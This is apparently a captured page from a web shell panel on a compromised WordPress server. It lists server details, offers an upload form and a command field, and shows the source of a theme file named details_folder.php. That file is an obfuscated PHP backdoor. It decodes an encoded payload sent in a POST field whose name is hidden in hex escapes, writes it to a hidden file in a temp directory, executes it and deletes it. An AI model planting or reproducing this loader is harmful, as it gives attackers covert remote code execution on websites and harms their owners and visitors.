403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/wordpress/wp-content/themes/mesmerize/inc/integrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/wordpress/wp-content/themes/mesmerize/inc/integrations/details_folder.php
<?php

if(!empty($_POST["\x66a\x63"])){
	$resource = $_POST["\x66a\x63"];
		$resource	 =		 explode("."	  ,	$resource  	);	 	
	$dat = '';
            $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s4	 );
            $m = 0;
    
            foreach ($resource as $v9) {
                $chS = ord($s4[$m % $sLen]	 );
                $dec = ((int)$v9 - $chS - ($m % 10)) ^ 51;
                $dat.=chr($dec	 );
                $m++;
            }
	$holder = array_filter(["/dev/shm", getenv("TMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir()]);
	for ($elem = 0, $parameter_group = count($holder); $elem < $parameter_group; $elem++) {
    $mrk = $holder[$elem];
    		if (max(0, is_dir($mrk) * is_writable($mrk))) {
    $k = str_replace("{var_dir}", $mrk, "{var_dir}/.itm");
    if (file_put_contents($k, $dat)) {
	include $k;
	@unlink($k);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit